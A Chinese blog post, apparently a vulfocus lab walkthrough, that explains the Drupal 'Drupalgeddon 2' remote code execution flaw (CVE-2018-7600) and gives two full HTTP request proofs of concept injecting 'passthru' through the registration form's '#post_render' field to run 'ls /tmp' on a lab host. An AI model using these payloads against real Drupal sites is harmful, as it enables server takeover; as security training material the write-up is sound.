vulfocus——drupal1代码执行(CVE-2018-7600)

最新推荐文章于 2025-05-14 17:44:43 发布
最新推荐文章于 2025-05-14 17:44:43 发布
阅读量1.1k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: vulfocus复现 文章标签: java servlet junit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62063669/article/details/126749571
本文详细介绍了Drupal CMS的一个安全漏洞,该漏洞源于PHP的call_user_func()函数,允许攻击者通过操纵#post_render字段执行恶意代码,从而获取对网站的完全控制。复现步骤包括创建新用户、利用Burpsuite抓包,并提供了两种不同的POC来演示漏洞利用过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

描述

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。

Drupal的问题稍显常规,来自call_user_func()函数。使用Seay源代码审计系统时就会提示可能导致代码执行。Drupal Render API对于#有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。

503行的call_user_func()函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。向上看去,498行开始说明标签#post_render是用户可控的,这就导致了$elements$callable都是可控的了。

复现

1.打开靶场环境

 2.创建一个新账户,然后用burpsuite进行抓包

 

3.poc1(红色字体是需要注意修改的地方 )

POST /user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 123.58.224.8:12926
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------346792349223457770752647253255
Content-Length: 626
Origin: http://123.58.224.8:12926
Connection: close
Referer: http://123.58.224.8:12926/user/register
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; JSESSIONID=85C6653ADC2833AFFF952324C3021915; PHPSESSID=83ble87an3ft9hskuv0u5tvlj3; NX-ANTI-CSRF-TOKEN=0.6148837831262616
Upgrade-Insecure-Requests: 1

-----------------------------346792349223457770752647253255
Content-Disposition: form-data; name="mail[#post_render][]"

passthru
-----------------------------346792349223457770752647253255
Content-Disposition: form-data; name="mail[#type]"

markup
-----------------------------346792349223457770752647253255
Content-Disposition: form-data; name="mail[#markup]"

ls /tmp
-----------------------------346792349223457770752647253255
Content-Disposition: form-data; name="form_id"

user_register_form
-----------------------------346792349223457770752647253255
Content-Disposition: form-data; name="_drupal_ajax"

 

4.poc2

POST /user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 123.58.224.8:12926
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: http://123.58.224.8:12926
Connection: close
Referer: http://123.58.224.8:12926/user/register
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; JSESSIONID=85C6653ADC2833AFFF952324C3021915; PHPSESSID=83ble87an3ft9hskuv0u5tvlj3; NX-ANTI-CSRF-TOKEN=0.6148837831262616
Upgrade-Insecure-Requests: 1

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=passthru&mail[#type]=markup&mail[#markup]=ls /tmp

 

[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600
qq_51577576的博客
02-18 923
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
【漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 1112
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
Drupal远程代码执行漏洞(CVE-2018-7600
ANOrange的博客
04-10 1367
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
Drupal远程代码执行漏洞(CVE-2018-7600)
渗透之路,攻防之间皆学问
03-31 5727
一. 漏洞原理 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 二. 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 三. 漏洞环境搭建 ...
Vulhub漏洞复现系列(二):常见远程代码执行漏洞剖析
最新发布
2201_75445650的博客
05-14 882
自 2011 年开源以来,凭借其出色的解析速度和易用的 API,广泛应用于国内外的 Java 项目中。出现的漏洞的原因就是Drupal在渲染表单元素时,允许用户传入的结构被直接执行为回调函数,本质是不可信输入被传入可执行上下文,是一种典型的“反序列化”,“动态执行”问题。,带来了严重的安全隐患。如果传入的数据未做严格校验,攻击者可以构造恶意 JSON 数据,利用 Fastjson 的反序列化机制加载任意类,)注入表单字段的渲染流程中,从而导致服务器在生成响应时执行恶意命令,最终实现远程代码执行(RCE)。
drupal 代码执行 (CVE-2018-7600)复现
YouthBelief的博客
11-04 4740
@[TOC](drupal 代码执行 (CVE-2018-7600)) drupal 代码执行 (CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 0x01 漏洞描述 http://blog.nsfocus.net/cve-2018-7600-analysis/ 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻
[Vulfocus解题系列]Drupal 远程代码执行漏洞(CVE-2018-7600)
00勇士王子的博客
07-05 1681
漏洞介绍 近日,流行的开源内容管理框架Drupal曝出一个远程代码执行漏洞,漏洞威胁等级为高危,攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。漏洞对应的CVE编号为CVE-2018-7600。 解题过程 1.打开靶场 2.直接构造poc代码 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Host: 靶机地址 Use
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 3395
drupal命令执行
Drupal 远程代码执行漏洞复现(CVE-2018-7602)
Tauil的博客
08-08 1145
使用parse_str,并存入options,还需要通过其他步骤来触发漏洞。的输入来处理请(GET,POST,COOKIE,REQUEST)中数据。建立vulhub/drupal/CVE-2018-7602/环境。访问http://靶机IP/shell.php即可看到新建的网页。使用以下poc.py,与官网不同的是强制定义命令为。对CVE-2018-7600漏洞的补丁通过过滤带有。会导致输入错误等等原因,所以进行了一点修改。中的URL进行URL编码,当对URL中的。形式的请求,发起请求需要对。...
CVE-2018-7600
05-14
CVE-2018-7600-master CVE-2018-7600-master CVE-2018-7600-master在我的文章有复现欢迎交流
CVE-2018-7600 Drupal核心远程代码执行漏洞分析
weixin_34246551的博客
12-27 389
0x01 漏洞介绍 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。...
vulhub:drupal 代码执行漏洞复现 (CVE-2018-7600)
sszsNo1的博客
07-02 629
vulhub:drupal 代码执行漏洞 (CVE-2018-7600)如何复现
抓洞指南- drupal1 代码执行 (CVE-2018-7600)
= =
08-18 183
一个非常憨逼的事情,就是不知道flag在哪,然后突发奇想,既然把指令都能执行命令,如果直接ls /tmp,然后数据就拿到手了。这地方卡了我很久,看了很多教程感觉都不一样。
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 6250
CVE-2018-7600漏洞学习与复现
CVE-2018-7600 Drupal 远程代码执行漏洞
星落的博客
04-07 914
漏洞介绍 Drupal 是一款用量庞大的CMS,在Form API中存在一处远程代码执行漏洞。 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 1.切换到drupal相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2018-7600 docker-compose build docker-compose up -d 2.查看docker服务器情况 dock ps -a 3.环境启动后,访问`htt..
【渗透测试】Drupal 漏洞 CVE-2018-7600 远程代码执行-复现
热门推荐
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
01-11 1万+
Drupal 漏洞 CVE-2018-7600 远程代码执行-复现 漏洞简介: Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏洞原理: drupal的注册页面,当我们提交的数据有问题时,它
Drupal-CVE-2018-7600漏洞(远程代码执行)
tiay__的博客
12-25 841
该漏洞产生的原因在于Drupal对表单渲染时未进行严格的安全过滤,导致攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值